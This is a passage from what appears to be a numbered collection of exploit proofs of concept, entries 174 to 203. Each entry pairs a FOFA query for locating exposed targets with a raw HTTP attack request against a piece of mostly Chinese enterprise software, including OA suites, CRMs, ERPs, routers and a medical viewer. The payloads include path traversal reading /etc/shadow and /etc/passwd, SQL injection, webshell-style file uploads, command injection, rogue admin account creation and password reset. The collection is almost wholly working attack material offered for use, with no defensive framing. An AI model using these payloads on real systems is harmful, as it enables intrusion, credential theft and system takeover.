aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"

------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system (Interlib) updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewer system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. Futong Tianxia Foreign Trade ERP (富通天下外贸ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone Networks Yunjian Security Management System (山石网科云鉴安全管理系统) setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. Feiqi Internet FE Enterprise Operations Management Platform (飞企互联-FE企业运营管理平台) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.
POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. Volans Internet Access Behavior Management System (飞鱼星上网行为管理系统) send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan Fengsu Technology Unified Authentication Platform (河南省风速科技统一认证平台) password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. Zheda Ente Customer Resource Management System (浙大恩特客户资源管理系统) Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. Aliyun Drive (阿里云盘) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit system (cockpit系统) assetsmanager/upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Run the PoC to obtain the CSRF value, then obtain the cookie, then upload the file and request it to get the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
2. Use the JWT obtained in the previous step to get the cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS Ocean Film and TV Management System (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder All-Media News Editing System (方正全媒体新闻采编系统) binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. WeEngine system (微擎系统) AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values below with the ones obtained:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"

-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. Redsea Cloud EHR (红海云EHR) PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--